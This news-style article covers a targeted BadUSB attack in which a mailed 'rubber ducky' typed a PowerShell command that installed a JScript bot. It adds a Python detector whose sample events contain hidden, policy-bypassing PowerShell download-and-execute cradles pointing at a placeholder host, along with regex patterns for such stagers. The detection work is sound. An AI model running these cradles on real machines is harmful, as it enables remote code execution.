A Rare BadUSB Attack Going Under Analysis
The attack in question was highly targeted and relied on a cunning social engineering trick: a fake gift card mailed together with a USB device of the kind known as a “rubber ducky”. A “rubber ducky” looks like an ordinary USB stick but is actually a programmable USB keyboard preloaded with keystrokes, which it types into whatever machine it is plugged into.
“Those types of attacks are typically so explicitly targeted that it’s rare to find them coming from actual attackers in the wild. Rare, but still out there,” Trustwave says.
The target was an undisclosed US hospitality provider. The company received an envelope containing a fake Best Buy gift card and a USB thumb drive, with instructions to plug the drive into a computer to see the list of items the gift card could be spent on. The drive, however, was a “rubber ducky”, a form of the attack class known as BadUSB, which is rarely seen in the wild: when connected, the device presents itself to the PC as a keyboard rather than as storage, and replays a prepared sequence of keypresses that launches a series of automated actions.
The good news is that the targeted company suspected the package was malicious and reached out to Trustwave. The researchers say in their report that once they plugged in the device, it fired off a sequence of automated keypresses that launched a PowerShell command.
To start the analysis, we inspected the drive for inscriptions such as serial numbers. At the head of the drive on the printed circuit board we saw “HW-374”. A quick Google search for this string found a “BadUSB Leonardo USB ATMEGA32U4” for sale on shopee.tw, the report says.
BadUSB Attack Downloads Unknown Malware
The PowerShell command downloaded a PowerShell script from a website, which in turn installed malware on the researchers’ analysis machine, identified as a JScript-based bot. At the time of the analysis the researchers could not find any similar sample of this malware.
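The chain described above, a hot-plugged device that types a PowerShell download-and-run command within seconds of appearing, is also what a defender can look for. The following is an added example, not code from the Trustwave report or this article: a small Python detection pass that correlates a newly installed HID keyboard with a suspicious PowerShell launch shortly afterwards, decoding any -EncodedCommand payload on the way. The event records are constructed stand-ins for Windows telemetry (a Kernel-PnP device-install record and a Sysmon Event ID 1 process-creation record); the field names, timestamps, VID/PID values and example.invalid URLs are assumptions, and the logic is written generally, so it also flags hidden-window, execution-policy-bypass and download-cradle launches that have nothing to do with this one incident.

```python
"""Correlate a fresh USB keyboard arrival with a suspicious PowerShell launch.
Added example (not the Trustwave report's code). Events are constructed,
simplified stand-ins for Kernel-PnP device-install and Sysmon Event ID 1
records; field names, timestamps, device IDs and URLs are assumptions."""
import base64
import re
from datetime import datetime, timedelta
from typing import Dict, List, Optional

# Command-line traits of a keystroke-injected PowerShell stager.
SUSPICIOUS_PATTERNS = {
    "hidden_window": re.compile(r"-w[a-z]*\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e[a-z]*\s+bypass", re.I),
    "download_cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|"
        r"Invoke-Expression|\bIEX\b|Net\.WebClient|Start-BitsTransfer", re.I),
}
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENCODED_ARG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_command_line(command_line: str) -> List[str]:
    """Name every suspicious trait in the raw command line and its decoded payload."""
    decoded = decode_encoded_command(command_line)
    text = command_line if decoded is None else f"{command_line} {decoded}"
    hits = [name for name, pat in SUSPICIOUS_PATTERNS.items() if pat.search(text)]
    if decoded is not None:
        hits.append("encoded_command")
    return hits


def keyboard_arrived_before(events: List[Dict], ts: datetime, window: timedelta) -> Optional[Dict]:
    """Most recent HID keyboard install within `window` before `ts`, or None."""
    found = [e for e in events if e["type"] == "device_install"
             and e["device_id"].upper().startswith("HID\\")
             and e.get("class", "").lower() == "keyboard"
             and timedelta(0) <= ts - datetime.fromisoformat(e["ts"]) <= window]
    return max(found, key=lambda e: e["ts"], default=None)


def detect(events: List[Dict], window_seconds: int = 120) -> List[Dict]:
    """Flag PowerShell launches with stager traits; severity is high when a keyboard
    was hot-plugged just before and the shell was spawned by explorer.exe (Win+R)."""
    alerts = []
    for e in events:
        if e["type"] != "process_create" or not e["image"].lower().endswith("powershell.exe"):
            continue
        hits = score_command_line(e["command_line"])
        if not hits:
            continue
        kb = keyboard_arrived_before(events, datetime.fromisoformat(e["ts"]),
                                     timedelta(seconds=window_seconds))
        from_shell = e["parent_image"].lower().endswith("\\explorer.exe")
        alerts.append({"ts": e["ts"], "indicators": hits,
                       "severity": "high" if kb and from_shell else "medium",
                       "keyboard_device": kb["device_id"] if kb else None,
                       "decoded": decode_encoded_command(e["command_line"])})
    return alerts


def _enc(script: str) -> str:
    # Build a -EncodedCommand value the way PowerShell expects it (sample data only).
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
# Constructed sample telemetry. VID 2341 / PID 8036 is what an Arduino Leonardo
# reports by default, but the attacker controls the descriptors: treat them as
# analyst context, never as the basis for an allowlist or blocklist.
SAMPLE_EVENTS = [
    {"ts": "2020-03-20T10:15:02", "type": "device_install", "class": "Keyboard",
     "device_id": "HID\\VID_2341&PID_8036&MI_02\\7&1a2b3c4d&0&0000"},
    {"ts": "2020-03-20T10:15:06", "type": "process_create", "image": PS,
     "parent_image": "C:\\Windows\\explorer.exe",
     "command_line": "powershell -w hidden -ep bypass -enc " + _enc(
         "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')")},
    # A cradle with no preceding keyboard arrival: still worth a look, lower priority.
    {"ts": "2020-03-20T14:30:40", "type": "process_create", "image": PS,
     "parent_image": "C:\\Windows\\explorer.exe",
     "command_line": 'powershell -c "Invoke-WebRequest http://example.invalid/u.ps1 -OutFile u.ps1"'},
    # Routine admin use from a console: no traits, so no alert.
    {"ts": "2020-03-20T15:02:11", "type": "process_create", "image": PS,
     "parent_image": "C:\\Windows\\System32\\cmd.exe",
     "command_line": "powershell -File C:\\scripts\\inventory.ps1"},
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a["severity"], a["ts"], a["indicators"], a["keyboard_device"])
```

A keyboard arrival on its own is not a signal, since people plug in keyboards all day; it is the combination of a fresh HID keyboard, explorer.exe as the parent (the Win+R route a keystroke payload typically takes) and a stager-style command line within a short window that lifts the alert to high. Blocking the Arduino VID/PID is not a fix either: the firmware on an ATMEGA32U4 board can present whatever descriptors its author chooses.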
“The malware is unknown to us. It is also hard to say if it is custom-built, but it probably is, because it is not widespread and seems to be targeted,” Phil Hay, Senior Research Manager at Trustwave, said in an email correspondence with ZDNet.
Shortly after the initial analysis, however, Trustwave found a file similar to the unknown malware uploaded to VirusTotal. Further analysis by fellow researchers at Facebook and Kaspersky indicates that the malware is most likely the work of the hacking group FIN7, believed to be behind the Carbanak malware. It is not known whether the file was uploaded by another security company investigating the same strain or by somebody else.
This rare hacking attempt shows that BadUSB attacks do take place in the real world. Because the device registers with the operating system as a keyboard rather than as removable storage, endpoint controls that only block USB mass storage do not stop it. The previous such attack to be documented was detailed in 2018 by Kaspersky researchers.
A curious aside: a rubber ducky attack featured in an episode of the TV show Mr Robot. In that Season 2 episode, Angela was to use a rubber ducky as a fallback if the femtocell hack failed: plug it in, wait a few seconds, and unplug it, which would have given fsociety a collection of FBI passwords.